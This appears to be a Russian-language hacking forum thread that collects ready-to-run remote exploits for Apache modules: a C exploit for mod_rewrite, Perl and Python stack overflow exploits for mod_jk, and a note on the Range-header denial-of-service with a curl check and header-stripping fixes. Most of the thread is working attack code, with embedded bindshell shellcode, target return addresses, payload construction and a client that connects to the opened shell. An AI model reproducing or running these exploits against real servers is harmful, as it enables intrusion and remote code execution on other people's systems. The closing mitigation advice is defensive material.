Сообщений в теме: 5

[$iD]

Цель: Apache 2.0.58 mod_rewrite
Воздействие: Выполнение произвольного кода

#include < stdio.h >
#include < windows.h >
#include < io.h >
#pragma comment( lib, "user32" )
#pragma comment( lib, "ws2_32" )

char get[ ] = 
	"/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
char shellcode[ ]=
	"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
	"\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
	"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x41\x41\x32\x42"
	"\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x49\x4b\x58\x56"
	"\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x56\x31\x47\x4c"
	"\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x6c\x4c\x4b\x61"
	"\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x4a\x37\x68\x6c"
	"\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x72\x30\x49\x6e"
	"\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x6f\x6b\x4c\x70"
	"\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x37\x6b\x71\x68"
	"\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x6b\x73\x4c\x31"
	"\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x74\x56\x61\x7a"
	"\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x5a\x75\x4c\x67"
	"\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x58\x68\x6b\x76"
	"\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x6b\x4b\x72\x65"
	"\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x64\x4e\x6b\x74"
	"\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x6c\x4c\x4b\x35"
	"\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x4e\x70\x4e\x44"
	"\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x31\x78\x6c\x33"
	"\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x43\x4d\x59\x69"
	"\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x70\x45\x51\x33"
	"\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x74\x45\x49\x54"
	"\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x64\x35\x4a\x52"
	"\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x69\x45\x59\x49"
	"\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x47\x50\x53\x74"
	"\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x4d\x42\x6b\x75"
	"\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x79\x4f\x33\x4e"
	"\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x51\x66\x33\x4b"
	"\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x59\x6e\x69\x47"
	"\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x74\x39\x6f\x76"
	"\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x50\x30\x50\x50"
	"\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x6f\x63\x65\x66"
	"\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x43\x42\x48\x54"
	"\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x4a\x32\x30\x32"
	"\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x57\x4b\x4f\x72"
	"\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x65\x67\x50\x4c"
	"\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x30\x33\x30\x4e"
	"\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x50\x33\x30\x33"
	"\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x61\x4a\x4c\x67"
	"\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41";
char finish[ ] = 
	"HTTP/1.0\r\nHost: ";
char payload2[ ] =
	"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x18"
	"\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\xf0\x20\xfc\xc5"
	"\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x60\xd8\xec\xb1"
	"\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\xf6\xe8\xc3\xa3"
	"\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x23\x8d\x27\x12"
	"\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x47\xc5\x02\xd1"
	"\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x93\x9a\x33\xb1"
	"\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x56\xd7\xef\x6a"
	"\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x47\x8d\xfc\xea"
	"\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x99\x34\x0b\x38"
	"\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\xce\x8a\x50\x69"
	"\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x7e\x8a\x8a\xdb"
	"\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x4d\x26\xd3\x52"
	"\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\xfd\x90\x85\x73"
	"\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x61\x1f\x7a\x6d"
	"\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x91\x3c\x69\x6a"
	"\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\xb2\x27\x41\x17"
	"\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\xe6\x6a\x15\xc5"
	"\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x49\x88\x56\x6b"
	"\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\xe7\xee\xfc\xea"
	"\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\xe8\x53\x07\x65"
	"\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a";


// Ripped from TESO code and modifed by ey4s for win32
int WINAPI
cmdshell( int sock ) {

	int				l;
	char			buf[ 1000 ];
	struct timeval	time;
	unsigned long	ul[ 2 ];

	time.tv_sec = 1;
	time.tv_usec = 0;

	while ( 1 ) {
		ul[ 0 ] = 1;
		ul[ 1 ] = sock;
		l = select( 0,( fd_set * )&ul,0,0,&time );
		if( l == 1 ) {
			l = recv( sock,buf,sizeof( buf ),0 );
			if ( l <= 0 )		
				return printf("[x] Connection closed.\n");
			l = write( 1,buf,l );
			if ( l<=0 )
				return printf("[x] Connection closed.\n");
		}
		else {
			l = read( 0,buf,sizeof( buf ) );
			if ( l<=0 )
				return printf("[x] Connection closed.\n");
			l = send( sock,buf,l,0 );
			if ( l<=0 )
				return printf("[x] Connection closed.\n");
		}
	}
}

DWORD WINAPI
Resolve( char *szHost ) {
	DWORD IP = inet_addr( szHost );
	if ( IP == INADDR_NONE ) {
		hostent *sHosten = gethostbyname( szHost );
		if ( sHosten == 0 ) {
			return INADDR_NONE;
		} // end if
		IP = *( ( DWORD * )sHosten -> h_addr_list[ 0 ] );
	} // end if
	return IP;
} // end of function Resolve

int WINAPI
sendsux( DWORD dwHost, DWORD dwPort, char* szSux ) {

	int			sockfd;
	SOCKADDR_IN	their_addr;

	printf( "[+]Connecting...\n" );
	if ( ( sockfd = socket( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
		return printf("[-]Socket error...\n" );
	their_addr.sin_family = AF_INET; 
	their_addr.sin_port = htons( dwPort ); 
	their_addr.sin_addr.s_addr = dwHost;
	memset( their_addr.sin_zero, 0, sizeof( their_addr.sin_zero ) );
	if ( connect( sockfd,( struct sockaddr * )&their_addr,sizeof( struct sockaddr ) ) == -1 )
		return printf( "[-]Unable to connect\n" );
	printf( "[+]Connected\n[+]Sending...\n" );
	if ( send( sockfd, szSux, lstrlen( szSux ), 0 ) == -1 )
		return printf("[-]Unable to send\n" );
	printf( "[+]Sent\n");
	closesocket( sockfd );
	Sleep( 3 );

	return 0x1337;
}

int
main( int argc, char *argv[ ] ) {


	char		buf[ 1024 ];
	char		payload[ 748 ];
	char		what[ 1024 ];
	DWORD		dwHost;
	WSADATA		wsa;
	int			sockfd;
	SOCKADDR_IN	their_addr;

	system( "cls" );
	printf(	" Exploit:\tapache mod rewrite exploit (win32)\n"
			" By:\t\tfabio/b0x (oc-192, old CoTS member)\n"
			" Greetings:\tcaffeine, raver, psikoma, cumatru\n"
			"\t\tinsomnia, teddym6, googleman, ares\n"
			"\t\ttrickster, rebel and Pentaguard\n\n"
			" Rewrited:\t0x48k/el-\n");
	if ( argc != 3 )
		return printf( " Usage:\t\tsploit.exe hostname rewrite_path\n");
	printf( "\n[+]Preparing payload\n" );
	wsprintf( payload, "GET /%s%s%s%s%s\r\n\r\n", argv[ 2 ], get, shellcode, finish, argv[ 1 ] );

	if ( WSAStartup( 0x0202, &wsa ) )
		return printf( "[-]WSAStartup error\n" );
	if ( ( dwHost = Resolve( argv[ 1 ] ) ) == INADDR_NONE )
		return printf( "[-]Resolve error\n" );
	printf("[+]Starting first stage...\n");
	if ( sendsux( dwHost, 80, payload ) != 0x1337 )
		return 0;
	printf("[+]Starting second stage...\n");
	if ( sendsux( dwHost, 4444, payload2 ) != 0x1337 )
		return 0;

	printf("[+] Try connecting to %s:4445 ...\n",argv[ 0 ] );
	if ( ( sockfd = socket( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
		return printf("[-]Socket error...\n" );
	their_addr.sin_family = AF_INET; 
	their_addr.sin_port = htons( 4445 ); 
	their_addr.sin_addr.s_addr = dwHost;
	memset( their_addr.sin_zero, 0, sizeof( their_addr.sin_zero ) );
	if ( connect( sockfd,( struct sockaddr * )&their_addr,sizeof( struct sockaddr ) ) == -1 )
		return printf( "[-]Unable to connect\n" );
	printf( "[+] Connected to shell at %s:4445\n\n", inet_ntoa( their_addr.sin_addr ) );
	cmdshell( sockfd );
	closesocket( sockfd );
	WSACleanup( );
	return 0;
}

[aka PSIH]

Apache w/ mod_jk Remote Exploit
by eliteboy

# Apache w/ mod_jk Remote Exploit
# by eliteboy

use IO::Socket;

print "***ELiTEBOY*PRESENTZ***APACHE*MOD_JK*REMOTE*EXPLOIT***\n";

$target = $ARGV[1];
if (($#ARGV != 1) || ($target < 1) || ($target > 3)) {
	print "Usage: modjkx.pl <hostname> <targettype>\n";
	print "1.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.20\n"
		 ."\tDebian 3.1/4.0*Apache 2.2.4/2.2.3&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n";
	print "2.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.19\n"
		 ."\tDebian 3.1 Sarge*Apache 2.2.4&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n";
	print "3.\tFreeBSD5.4-RELEASE *** Apache 2.2.4 mod_jk-1.2.20/mod_jk-1.2.19\n";
	exit;
}

$port = 80;

### lnx metasploit bindshell code port 2007
my $lnx_shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x49".
"\x58\x50\x30\x42\x31\x42\x41\x6b\x41\x41\x59\x41\x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x69\x79\x37\x41\x6b".
"\x6b\x63\x63\x57\x33\x72\x73\x73\x5a\x76\x62\x32\x4a\x55\x36\x51".
"\x48\x4e\x79\x4e\x69\x38\x61\x6a\x6d\x4f\x70\x7a\x36\x77\x33\x30".
"\x52\x42\x46\x31\x78\x46\x67\x38\x57\x30\x66\x50\x53\x6d\x59\x4b".
"\x51\x32\x4a\x63\x56\x70\x58\x50\x50\x50\x51\x50\x56\x6f\x79\x4b".
"\x51\x7a\x6d\x4f\x70\x48\x30\x65\x36\x4b\x61\x4d\x33\x38\x4d\x4b".
"\x30\x72\x72\x50\x52\x56\x36\x42\x63\x6b\x39\x68\x61\x6e\x50\x33".
"\x56\x68\x4d\x6b\x30\x6d\x43\x70\x6a\x33\x32\x66\x39\x6c\x70\x37".
"\x4f\x58\x4d\x6f\x70\x42\x69\x31\x69\x39\x69\x6e\x50\x74\x4b\x46".
"\x32\x32\x48\x56\x4f\x46\x4f\x64\x33\x62\x48\x35\x38\x56\x4f\x42".
"\x42\x30\x69\x50\x6e\x6b\x39\x4a\x43\x56\x32\x73\x63\x4b\x39\x48".
"\x61\x68\x4d\x6d\x50\x49";

### bsd metasploit bindshell code port 5555
my $bsd_shellcode =
"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff".
"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49".
"\x49\x49\x51\x5a\x6a\x42\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x52".
"\x42\x41\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50".
"\x75\x59\x79\x53\x5a\x31\x71\x33\x68\x4d\x49\x50\x52\x32\x48\x76".
"\x70\x43\x32\x55\x45\x6f\x43\x6c\x49\x68\x61\x36\x32\x51\x52\x36".
"\x32\x62\x62\x52\x72\x50\x6a\x66\x70\x5a\x6d\x4f\x70\x4f\x69\x6f".
"\x63\x50\x51\x32\x73\x73\x62\x50\x6a\x72\x48\x36\x38\x38\x4d\x4f".
"\x70\x4c\x70\x51\x7a\x68\x4d\x6f\x70\x62\x72\x62\x73\x50\x52\x58".
"\x30\x65\x4e\x5a\x6d\x4d\x50\x6c\x57\x32\x4a\x66\x62\x31\x49\x41".
"\x7a\x41\x4a\x52\x78\x46\x31\x30\x57\x32\x71\x4a\x6d\x4d\x50\x77".
"\x39\x51\x69\x6c\x35\x30\x50\x32\x48\x66\x4f\x56\x4f\x32\x53\x62".
"\x48\x52\x48\x76\x4f\x70\x62\x32\x49\x50\x6e\x4d\x59\x5a\x43\x52".
"\x70\x72\x74\x56\x33\x70\x53\x6e\x50\x47\x4b\x38\x4d\x6b\x30\x42".
"A" x 100;

$alignment = 4127;

$|=1;

if ($target eq 1) {
	$shellcode = $lnx_shellcode;
	$addr = 0xbffff060;
}

if ($target eq 2) {
	$shellcode = $lnx_shellcode;
	$addr = 0xbfffef4c;
}

if ($target eq 3) {
	$shellcode = $bsd_shellcode;
	$addr = 0xbfbfe5d5;
}

$offset = pack('l', $addr);

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
							  PeerPort => $port,
							  Proto	=> 'tcp');

$a = "A" x ($alignment-4-length($shellcode)) . $shellcode . $offset;

print $sock "GET /$a HTTP/1.0\r\n\r\n";

while(<$sock>) {
	print;
}

[$iD]

Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
Цель: Apache mod_jk 1.2.19
Воздействие: Выполнение произвольного кода

#!/usr/bin/python
#
#   _____ _   _ _____  _____ _____ _____
#  /  ___| |_| |  _  \|  _  |  _  |_   _|
#  | (___|  _  | [_)_/| (_) | (_) | | |
#  \_____|_| |_|_| |_||_____|_____| |_|
#		 C. H. R. O. O. T.  SECURITY  GROUP
#		 - -- ----- --- -- -- ---- --- -- -
#					  ]]>[url="http://forum.prologic.su/go.php?http://url=http://www.chroot.org"]http://www.chroot.org[/url]]]>
#
#						  _   _ _ _____ ____ ____ __  _
#		Hacks In Taiwan  | |_| | |_   _|  __|	|  \| |
#		Conference 2008  |  _  | | | | | (__| () |	 |
#						 |_| |_|_| |_| \____|____|_|\__|
#									  ]]>[url="http://forum.prologic.su/go.php?http://url=http://www.hitcon.org"]http://www.hitcon.org[/url]]]>
#
#
#  Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
#
#  Author ======:: unohope [at] chroot [dot] org
#
#  IRC =========:: irc.chroot.org #chroot
#
#  ScriptName ==:: Apache Module mod_jk/1.2.19
#
#  Vendor ======:: ]]>[url="http://forum.prologic.su/go.php?http://url=http://tomcat.apache.org/"]http://tomcat.apache.org/[/url]]]>
#
#  Download ====:: ]]>[url="http://forum.prologic.su/go.php?http://url=http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/"]http://archive.apach...ies/win32/[/url]]]>
#
#  Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19
#				  Apache/2.0.59 (Win32) mod_jk/1.2.19
#
#  Greets ======:: zha0
#
#
#  [root@wargame tmp]# ./apx-jk_mod-1.2.19
#  Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
#  usage: ./apx-jk_mod-1.2.19 <host>
#
#  [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
#  Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
#	[+] connecting to 192.168.1.78 ...
#
#  Trying 192.168.1.78...
#  Connected to 192.168.1.78.
#  Escape character is '^]'.
#  Microsoft Windows XP [.. 5.1.2600]
#  © Copyright 1985-2001 Microsoft Corp.
#
#  C:\AppServ\Apache2>
#
#

import os, sys, time
from socket import *

shellcode  = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68"
shellcode += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32"
shellcode += "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43"
shellcode += "\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71"
shellcode += "\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c"
shellcode += "\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74"
shellcode += "\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66"
shellcode += "\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c"
shellcode += "\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b"
shellcode += "\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79"
shellcode += "\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54"
shellcode += "\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36"
shellcode += "\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30"
shellcode += "\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66"
shellcode += "\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73"
shellcode += "\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b"
shellcode += "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63"
shellcode += "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a"
shellcode += "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f"
shellcode += "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73"
shellcode += "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c"
shellcode += "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70"
shellcode += "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61"
shellcode += "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33"
shellcode += "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32"
shellcode += "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e"
shellcode += "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39"
shellcode += "\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39"
shellcode += "\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e"
shellcode += "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e"
shellcode += "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51"
shellcode += "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64"
shellcode += "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37"
shellcode += "\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70"
shellcode += "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e"
shellcode += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73"
shellcode += "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61"
shellcode += "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78"
shellcode += "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e"
shellcode += "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30"
shellcode += "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b"
shellcode += "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b"
shellcode += "\x4f\x69\x46\x4b\x4f\x6e\x30\x68";

foo_base = 8
buf_base = 4087
buf_offset = foo_base * 11
nop = "\x90"
ret = "\xcc\x2a\xd9\x77"
buf = nop*foo_base + shellcode + nop*(buf_base - foo_base - len(shellcode) - buf_offset) + ret
buf += "\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3" + nop*(buf_offset - foo_base - 3)

def usage():
  print 'usage: %s <host>\n' % sys.argv[0]
  sys.exit(-1)

def xpl():
  try:
	print len(buf)
	sockaddr = (host, 80)
	s = socket(AF_INET, SOCK_STREAM)
	s.connect(sockaddr)
	payload = buf + 'HTTP/1.0\r\nHost: %s\r\n\r\n\' % host
	s.send('GET /' + payload)
	s.close()
	print '  [+] connecting to %s ...\n' % host
	time.sleep(3)
	os.system("telnet %s 8888" % host)
  except:
	print '  [-] EXPLOIT FAILED!\n'

if __name__ == '__main__':
  print 'Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\n'
  try:
	host = sys.argv[1]
  except IndexError:
	usage()
  xpl()


# [NOTE]
#
# !! This is just for educational purposes, DO NOT use for illegal. !!
#

[###]

Apache mod_dav / svn Remote Denial of Service Exploit

[###]

Как завалить Apache?

Появился занятный скрипт, под названием ]]>killapache.pl]]>.

Как она работает и что он делает:
Скрипт запускает в несколько потоков запрос

HEAD / HTTP/1.1
Host: www.example.com
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,<...>,5-1299,5-1300
Accept-Encoding: gzip
Connection: close

Apache в свою очередь собирает в памяти длинный ответ запрошенного файла, который занимает память, что приводит к DoS.

На данный момент исправления этого досадного бага нету. В скором времени стоит ждать патчик или новую версию.

Существует 2 варианта обхода:

• nginx
  
• mod_header'ом закрыть заголовки.

[$iD]

Хабр говорит о еще одной беде с apache

Уязвимости также подвержен устаревший заголовок Request-Range времен MSIE 3. Проверить, уязвим ли ваш сервер к этому варианту атаки можно так:

curl -I -H "Request-Range: bytes=0-1,0-2,0-3,0-4,0-5,0-6" -s www.example.com/robots.txt | grep Partial

Если у вас на такие запросы отвечает Apache и вы видите 206 Partial Content, значит быть беде.

Решение для nginx

Запретить nginx проксировать опасные заголовки можно директивами:

proxy_set_header Range "";
proxy_set_header Request-Range "";

Решение для Apache
Заблокировать проблемные заголовки можно при помощи mod_headers:

# a2enmod headers
RequestHeader unset Range
RequestHeader unset Request-Range